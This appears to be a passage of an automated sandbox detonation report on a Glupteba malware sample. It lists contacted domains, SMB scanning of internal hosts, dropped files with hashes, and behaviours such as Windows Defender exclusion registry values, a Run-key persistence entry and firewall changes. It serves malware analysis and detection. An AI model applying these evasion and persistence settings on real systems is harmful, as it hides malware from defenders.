| N/A | 127.0.0.1:31465 | tcp | |
| BG | 185.82.216.111:443 | server14.localstats.org | tcp |
| N/A | 127.0.0.1:31465 | tcp | |
| BG | 185.82.216.111:443 | server14.localstats.org | tcp |
| US | 8.8.8.8:53 | carsalessystem.com | udp |
| US | 172.67.221.71:443 | carsalessystem.com | tcp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | trythisgid.com | udp |
| CZ | 46.8.8.100:443 | trythisgid.com | tcp |
| US | 8.8.8.8:53 | stun.ipfire.org | udp |
| DE | 81.3.27.44:3478 | stun.ipfire.org | udp |
| US | 8.8.8.8:53 | snickerfool.com | udp |
| NL | 80.79.4.25:80 | snickerfool.com | tcp |
| NL | 80.79.4.25:80 | snickerfool.com | tcp |
| US | 8.8.8.8:53 | ww82.trythisgid.com | udp |
| US | 199.59.243.225:80 | ww82.trythisgid.com | tcp |
| N/A | 10.127.0.1:445 | tcp | |
| N/A | 10.127.0.22:445 | tcp | |
| N/A | 10.127.0.3:445 | tcp | |
| N/A | 10.127.0.54:445 | tcp | |
| N/A | 10.127.0.4:445 | tcp | |
| N/A | 10.127.0.9:445 | tcp | |
| N/A | 10.127.0.16:445 | tcp | |
| N/A | 10.127.0.52:445 | tcp | |
| N/A | 10.127.0.59:445 | tcp | |
| N/A | 10.127.0.62:445 | tcp | |
| N/A | 10.127.0.0:445 | tcp | |
| N/A | 10.127.0.53:445 | tcp | |
| N/A | 10.127.0.40:445 | tcp | |
| N/A | 10.127.0.48:445 | tcp | |
| N/A | 10.127.0.6:445 | tcp | |
| N/A | 10.127.0.7:445 | tcp | |
| N/A | 10.127.0.12:445 | tcp | |
| N/A | 10.127.0.56:445 | tcp | |
| N/A | 10.127.0.63:445 | tcp | |
| N/A | 10.127.0.31:445 | tcp | |
| N/A | 10.127.0.21:445 | tcp | |
| N/A | 10.127.0.34:445 | tcp | |
| N/A | 10.127.0.47:445 | tcp | |
| N/A | 10.127.0.5:445 | tcp | |
| N/A | 10.127.0.51:445 | tcp | |
| N/A | 10.127.0.43:445 | tcp | |
| N/A | 10.127.0.41:445 | tcp | |
| N/A | 10.127.0.14:445 | tcp | |
| N/A | 10.127.0.19:445 | tcp | |
| N/A | 10.127.0.50:445 | tcp | |
| N/A | 10.127.0.15:445 | tcp | |
| N/A | 10.127.0.18:445 | tcp | |
| N/A | 10.127.0.28:445 | tcp | |
| N/A | 10.127.0.17:445 | tcp | |
| N/A | 10.127.0.35:445 | tcp | |
| N/A | 10.127.0.38:445 | tcp | |
| N/A | 10.127.0.26:445 | tcp | |
| N/A | 10.127.0.32:445 | tcp | |
| N/A | 10.127.0.29:445 | tcp | |
| N/A | 10.127.0.49:445 | tcp | |
| N/A | 10.127.0.61:445 | tcp | |
| N/A | 10.127.0.25:445 | tcp | |
| N/A | 10.127.0.30:445 | tcp | |
| N/A | 10.127.0.42:445 | tcp | |
| N/A | 10.127.0.13:445 | tcp | |
| N/A | 10.127.0.58:445 | tcp | |
| N/A | 10.127.0.24:445 | tcp | |
| N/A | 10.127.0.33:445 | tcp | |
| N/A | 10.127.0.23:445 | tcp | |
| N/A | 10.127.0.55:445 | tcp | |
| N/A | 10.127.0.60:445 | tcp | |
| N/A | 10.127.0.57:445 | tcp | |
| N/A | 10.127.0.46:445 | tcp | |
| N/A | 10.127.0.45:445 | tcp | |
| N/A | 10.127.0.10:445 | tcp | |
| N/A | 10.127.0.2:445 | tcp | |
| N/A | 10.127.0.11:445 | tcp | |
| N/A | 10.127.0.44:445 | tcp | |
| N/A | 10.127.0.8:445 | tcp | |
| N/A | 10.127.0.20:445 | tcp | |
| N/A | 10.127.0.37:445 | tcp | |
| N/A | 10.127.0.27:445 | tcp | |
| N/A | 10.127.0.36:445 | tcp | |
| N/A | 10.127.0.39:445 | tcp | |
| N/A | 10.127.0.83:445 | tcp | |
| N/A | 10.127.0.85:445 | tcp | |
| N/A | 10.127.0.72:445 | tcp | |
| N/A | 10.127.0.112:445 | tcp | |
| N/A | 10.127.0.89:445 | tcp | |
| N/A | 10.127.0.94:445 | tcp | |
| N/A | 10.127.0.69:445 | tcp | |
| N/A | 10.127.0.111:445 | tcp | |
| N/A | 10.127.0.95:445 | tcp | |
| N/A | 10.127.0.86:445 | tcp | |
| N/A | 10.127.0.92:445 | tcp | |
| N/A | 10.127.0.71:445 | tcp | |
| N/A | 10.127.0.77:445 | tcp | |
| N/A | 10.127.0.100:445 | tcp | |
| N/A | 10.127.0.81:445 | tcp | |
| N/A | 10.127.0.67:445 | tcp | |
| N/A | 10.127.0.122:445 | tcp | |
| N/A | 10.127.0.103:445 | tcp | |
| N/A | 10.127.0.127:445 | tcp | |
| N/A | 10.127.0.101:445 | tcp | |
| N/A | 10.127.0.65:445 | tcp | |
| N/A | 10.127.0.105:445 | tcp | |
| N/A | 10.127.0.110:445 | tcp | |
| N/A | 10.127.0.119:445 | tcp | |
| N/A | 10.127.0.64:445 | tcp | |
| N/A | 10.127.0.109:445 | tcp | |
| N/A | 10.127.0.102:445 | tcp | |
| N/A | 10.127.0.121:445 | tcp | |
| N/A | 10.127.0.91:445 | tcp | |
| N/A | 10.127.0.116:445 | tcp | |
| N/A | 10.127.0.99:445 | tcp | |
| N/A | 10.127.0.97:445 | tcp | |
| N/A | 10.127.0.79:445 | tcp | |
| N/A | 10.127.0.87:445 | tcp | |
| N/A | 10.127.0.66:445 | tcp | |
| N/A | 10.127.0.107:445 | tcp | |
| N/A | 10.127.0.90:445 | tcp | |
| N/A | 10.127.0.80:445 | tcp | |
| N/A | 10.127.0.115:445 | tcp | |
| N/A | 10.127.0.75:445 | tcp | |
| N/A | 10.127.0.73:445 | tcp | |
| N/A | 10.127.0.123:445 | tcp | |
| N/A | 10.127.0.74:445 | tcp | |
| N/A | 10.127.0.106:445 | tcp | |
| N/A | 10.127.0.93:445 | tcp | |
| N/A | 10.127.0.113:445 | tcp | |
| N/A | 10.127.0.98:445 | tcp | |
| N/A | 10.127.0.84:445 | tcp | |
| N/A | 10.127.0.88:445 | tcp | |
| N/A | 10.127.0.117:445 | tcp | |
| N/A | 10.127.0.120:445 | tcp | |
| N/A | 10.127.0.124:445 | tcp | |
| N/A | 10.127.0.70:445 | tcp | |
| N/A | 10.127.0.82:445 | tcp | |
| N/A | 10.127.0.118:445 | tcp | |
| N/A | 10.127.0.126:445 | tcp | |
| N/A | 10.127.0.125:445 | tcp | |
| N/A | 10.127.0.114:445 | tcp | |
| N/A | 10.127.0.76:445 | tcp | |
| N/A | 10.127.0.78:445 | tcp | |
| N/A | 10.127.0.108:445 | tcp | |
| N/A | 10.127.0.68:445 | tcp | |
| N/A | 10.127.0.96:445 | tcp | |
| N/A | 10.127.0.104:445 | tcp |
Files
memory/2172-0-0x0000000003720000-0x0000000003B18000-memory.dmp
memory/2172-1-0x0000000003720000-0x0000000003B18000-memory.dmp
memory/2172-2-0x0000000003B20000-0x000000000440B000-memory.dmp
memory/2172-3-0x0000000000400000-0x0000000000D1C000-memory.dmp
memory/2172-6-0x0000000000400000-0x0000000000D1C000-memory.dmp
memory/2172-8-0x0000000003B20000-0x000000000440B000-memory.dmp
memory/2172-7-0x0000000003720000-0x0000000003B18000-memory.dmp
memory/2208-9-0x0000000000400000-0x0000000001DFE000-memory.dmp
memory/2208-5-0x0000000003740000-0x0000000003B38000-memory.dmp
memory/2172-4-0x0000000000400000-0x0000000001DFE000-memory.dmp
memory/2208-10-0x0000000000400000-0x0000000001DFE000-memory.dmp
memory/2208-11-0x0000000000400000-0x0000000001DFE000-memory.dmp
\Windows\rss\csrss.exe
| MD5 | 389bd8b7641c77c295ac8e270feb2913 |
| SHA1 | 3c4bd39414f24c0ece254d77122ca5a1bdfbca0f |
| SHA256 | a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39 |
| SHA512 | bc3f1428ef5ebe0f8d3da2f0dbb1f94a11ebcbb5495eee878b6ef05c30bca1513058fc69100954f6c752243e947b12faebc8bfe9adb378ca620cb01cacb5674e |
memory/2208-22-0x0000000000400000-0x0000000001DFE000-memory.dmp
memory/2940-21-0x0000000003700000-0x0000000003AF8000-memory.dmp
\Users\Admin\AppData\Local\Temp\csrss\patch.exe
| MD5 | 13aaafe14eb60d6a718230e82c671d57 |
| SHA1 | e039dd924d12f264521b8e689426fb7ca95a0a7b |
| SHA256 | f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3 |
| SHA512 | ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3 |
memory/1488-27-0x0000000140000000-0x00000001405E8000-memory.dmp
\Users\Admin\AppData\Local\Temp\dbghelp.dll
| MD5 | f0616fa8bc54ece07e3107057f74e4db |
| SHA1 | b33995c4f9a004b7d806c4bb36040ee844781fca |
| SHA256 | 6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026 |
| SHA512 | 15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c |
\Users\Admin\AppData\Local\Temp\symsrv.dll
| MD5 | 5c399d34d8dc01741269ff1f1aca7554 |
| SHA1 | e0ceed500d3cef5558f3f55d33ba9c3a709e8f55 |
| SHA256 | e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f |
| SHA512 | 8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d |
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
| MD5 | 1afff8d5352aecef2ecd47ffa02d7f7d |
| SHA1 | 8b115b84efdb3a1b87f750d35822b2609e665bef |
| SHA256 | c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1 |
| SHA512 | e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb |
memory/1488-43-0x0000000140000000-0x00000001405E8000-memory.dmp
\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
| MD5 | d98e33b66343e7c96158444127a117f6 |
| SHA1 | bb716c5509a2bf345c6c1152f6e3e1452d39d50d |
| SHA256 | 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1 |
| SHA512 | 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5 |
C:\Users\Admin\AppData\Local\Temp\Cab3F53.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 29f65ba8e88c063813cc50a4ea544e93 |
| SHA1 | 05a7040d5c127e68c25d81cc51271ffb8bef3568 |
| SHA256 | 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184 |
| SHA512 | e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa |
C:\Users\Admin\AppData\Local\Temp\Tar4054.tmp
| MD5 | 435a9ac180383f9fa094131b173a2f7b |
| SHA1 | 76944ea657a9db94f9a4bef38f88c46ed4166983 |
| SHA256 | 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34 |
| SHA512 | 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a |
memory/2940-106-0x0000000000400000-0x0000000001DFE000-memory.dmp
memory/2940-111-0x0000000000400000-0x0000000001DFE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error
| MD5 | fd2727132edd0b59fa33733daa11d9ef |
| SHA1 | 63e36198d90c4c2b9b09dd6786b82aba5f03d29a |
| SHA256 | 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e |
| SHA512 | 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e |
C:\Users\Admin\AppData\Local\Temp\osloader.exe
| MD5 | e2f68dc7fbd6e0bf031ca3809a739346 |
| SHA1 | 9c35494898e65c8a62887f28e04c0359ab6f63f5 |
| SHA256 | b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4 |
| SHA512 | 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579 |
C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error
| MD5 | fafbf2197151d5ce947872a4b0bcbe16 |
| SHA1 | a86eaa2dd9fc6d36fcfb41df7ead8d1166aea020 |
| SHA256 | feb122b7916a1e62a7a6ae8d25ea48a2efc86f6e6384f5526e18ffbfc5f5ff71 |
| SHA512 | acbd49a111704d001a4ae44d1a071d566452f92311c5c0099d57548eddc9b3393224792c602022df5c3dd19b0a1fb4eff965bf038c8783ae109336699f9d13f6 |
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
| MD5 | d98e78fd57db58a11f880b45bb659767 |
| SHA1 | ab70c0d3bd9103c07632eeecee9f51d198ed0e76 |
| SHA256 | 414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0 |
| SHA512 | aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831 |
memory/2940-147-0x0000000000400000-0x0000000001DFE000-memory.dmp
C:\Windows\windefender.exe
| MD5 | 8e67f58837092385dcf01e8a2b4f5783 |
| SHA1 | 012c49cfd8c5d06795a6f67ea2baf2a082cf8625 |
| SHA256 | 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa |
| SHA512 | 40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec |
memory/2388-151-0x0000000000400000-0x00000000008DF000-memory.dmp
memory/2432-154-0x0000000000400000-0x00000000008DF000-memory.dmp
memory/2388-155-0x0000000000400000-0x00000000008DF000-memory.dmp
memory/2940-156-0x0000000000400000-0x0000000001DFE000-memory.dmp
memory/2432-157-0x0000000000400000-0x00000000008DF000-memory.dmp
memory/2940-159-0x0000000000400000-0x0000000001DFE000-memory.dmp
memory/2940-160-0x0000000000400000-0x0000000001DFE000-memory.dmp
memory/2432-162-0x0000000000400000-0x00000000008DF000-memory.dmp
memory/2940-163-0x0000000000400000-0x0000000001DFE000-memory.dmp
memory/2940-165-0x0000000000400000-0x0000000001DFE000-memory.dmp
memory/2940-167-0x0000000000400000-0x0000000001DFE000-memory.dmp
memory/2432-169-0x0000000000400000-0x00000000008DF000-memory.dmp
memory/2940-168-0x0000000000400000-0x0000000001DFE000-memory.dmp
memory/2940-171-0x0000000000400000-0x0000000001DFE000-memory.dmp
memory/2940-173-0x0000000000400000-0x0000000001DFE000-memory.dmp
memory/2940-175-0x0000000000400000-0x0000000001DFE000-memory.dmp
memory/2940-177-0x0000000000400000-0x0000000001DFE000-memory.dmp
memory/2940-179-0x0000000000400000-0x0000000001DFE000-memory.dmp
memory/2940-181-0x0000000000400000-0x0000000001DFE000-memory.dmp
memory/2940-182-0x0000000000400000-0x0000000001DFE000-memory.dmp
memory/2940-185-0x0000000000400000-0x0000000001DFE000-memory.dmp
memory/2940-187-0x0000000000400000-0x0000000001DFE000-memory.dmp
memory/2940-189-0x0000000000400000-0x0000000001DFE000-memory.dmp
memory/2940-190-0x0000000000400000-0x0000000001DFE000-memory.dmp
memory/2940-193-0x0000000000400000-0x0000000001DFE000-memory.dmp
memory/2940-195-0x0000000000400000-0x0000000001DFE000-memory.dmp
memory/2940-197-0x0000000000400000-0x0000000001DFE000-memory.dmp
memory/2940-199-0x0000000000400000-0x0000000001DFE000-memory.dmp
memory/2940-201-0x0000000000400000-0x0000000001DFE000-memory.dmp
memory/2940-203-0x0000000000400000-0x0000000001DFE000-memory.dmp
memory/2940-204-0x0000000000400000-0x0000000001DFE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
| MD5 | dcb505dc2b9d8aac05f4ca0727f5eadb |
| SHA1 | 4f633edb62de05f3d7c241c8bc19c1e0be7ced75 |
| SHA256 | 61f9194b9f33611ec902f02755cf2e86f0bbc84c2102c6e5d1874f9bae78e551 |
| SHA512 | 31e1fce9aca3b5d9afc85640af04b4542b9897f7d60b699e3153516137d9358d3c101cacc04e9e594e36b8622e9489cecf0dda210662563565d80fb9a33549b3 |
memory/2940-215-0x000000002E650000-0x000000002EB31000-memory.dmp
memory/2560-216-0x0000000000400000-0x00000000008E1000-memory.dmp
memory/2940-214-0x000000002E650000-0x000000002EB31000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
| MD5 | 713674d5e968cbe2102394be0b2bae6f |
| SHA1 | 90ac9bd8e61b2815feb3599494883526665cb81e |
| SHA256 | f724b2849e7dc38bf62114c11092020073bea509e2bc57dea7a94a2fc9c23057 |
| SHA512 | e9fba80067ac39d5907560abd044bb97dfcf078db2b6696ff4ca5990d9803a0c24b39d04e05682ac3dac8bc472e2ee0c573a46514e907f4d9673d4e7a76caafb |
memory/2940-225-0x000000002E650000-0x000000002EF1D000-memory.dmp
memory/2560-227-0x0000000000400000-0x00000000008E1000-memory.dmp
\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
| MD5 | 1bf850b4d9587c1017a75a47680584c4 |
| SHA1 | 75cd4738ffc07f203c3f3356bc946fdd0bcdbe19 |
| SHA256 | ac470c2fa05a67dd03cdc427e9957e661cd0ec7aecd9682ddb0b32c5cfc18955 |
| SHA512 | ed57be8c5a982bcbf901c2b035eb010e353508e7c7df338adc6e5c307e94427645e5f5ec28667fd861420b9411b4ade96ea6987519ed65e6c1d905b6eadfce08 |
memory/2940-236-0x0000000000400000-0x0000000001DFE000-memory.dmp
memory/1208-239-0x0000000000400000-0x00000000008E8000-memory.dmp
memory/1016-238-0x00000000003F0000-0x0000000000CBD000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-09 23:20
Reported
2024-05-09 23:25
Platform
win10-20240404-en
Max time kernel
300s
Max time network
299s
Command Line
Signatures
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe = "0" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe | N/A |
| N/A | N/A | C:\Windows\windefender.exe | N/A |
| N/A | N/A | C:\Windows\windefender.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe = "0" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
Manipulates WinMonFS driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMonFS | C:\Windows\rss\csrss.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\windefender.exe | C:\Windows\rss\csrss.exe | N/A |
| File opened for modification | C:\Windows\windefender.exe | C:\Windows\rss\csrss.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
